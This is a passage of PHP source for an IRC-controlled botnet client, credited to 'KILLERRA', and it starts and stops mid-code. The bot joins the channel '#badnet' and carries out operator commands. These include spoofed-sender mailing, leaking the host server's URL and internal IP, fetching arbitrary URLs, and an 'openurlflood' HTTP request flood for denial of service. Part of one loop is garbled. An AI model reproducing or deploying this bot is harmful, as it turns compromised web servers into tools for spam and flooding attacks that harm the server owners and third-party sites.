"", "port"=> 6667, "pass"=> "", "prefix"=> "", "maxrand"=> 15, "chan"=> "#badnet", "key"=> "1587", "modes"=> "+p", "password"=> "", "trigger"=> ".", "hostauth"=> "*" ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = "dupek"; $alph = range("a","z"); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']); $this->send("USER $ident localhost :$ident"); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn, 2048)); $cmd = explode(" ",$this->buf); if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] =="001") { $this->send("MODE ".$this->nick." ".$this->config['modes']); $this->join($this->config['chan'],$this->config['key']); } if(isset($cmd[1]) && $cmd[1]=="433") { $this->set_nick(); } if($this->buf != $old_buf) { $mcmd = array(); $msg = substr(strstr($this->buf," :"),2); $msgcmd = explode(" ",$msg); $nick = explode("!",$cmd[0]); $vhost = explode("@",$nick[1]); $vhost = $vhost[1]; $nick = substr($nick[0],1); $host = $cmd[0]; if($msgcmd[0]==$this->nick) { for($i=0;$i2) { switch($cmd[1]) { case "PRIVMSG": if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) { } elseif($this->is_logged_in($host)) { if(substr($mcmd[0],0,1)==".") { switch(substr($mcmd[0],1)) { case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; case "mail": if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[Mail] Mails can't be send."); } else { $this->privmsg($this->config['chan'],"[Mail] Mails was send to: ".$mcmd[1]."."); } } break; case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[DNS] ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[DNS] ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; case "url": $this->privmsg($this->config['chan'],"[Bot Url] http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]"); break; case "info": $this->privmsg($this->config['chan'],"[Server Information] No Infos sorry :( ."); break; case "bot": $this->privmsg($this->config['chan'],"[Bot Information] Bot by KILLERRA v1.1"); break; case "rndnick": $this->set_nick(); break; case "ipaddr": $ip = $_SERVER['SERVER_ADDR']; $this->privmsg($this->config['chan'], "[Intern-Address] $ip"); break; case "openurl": if(count($mcmd) > 1) { $url = $mcmd[1]; file_get_contents($url); $this->privmsg($this->config['chan'], "[OpenUrl] Request was send to ".$url); } else { $this->privmsg($this->config['chan'], "[OpenUrl] Please use .openurl ."); } break; case "openurlflood": if(count($mcmd) > 2) { $url = $mcmd[1]; $time = $mcmd[2]; $endtime = time() + $time; $this->privmsg($this->config['chan'], "[OpenUrl Flood] Requestflood was start on ".$url." for ".$time." seconds."); while(time() < $endtime) { file_get_contents($url); } $this->privmsg($this->config['chan'], "[OpenUrl Flood] Requestflood was end on ".$url."."); } else { $this->privmsg($this->config['chan'], "[OpenUrl Flood] Please use .openurlflood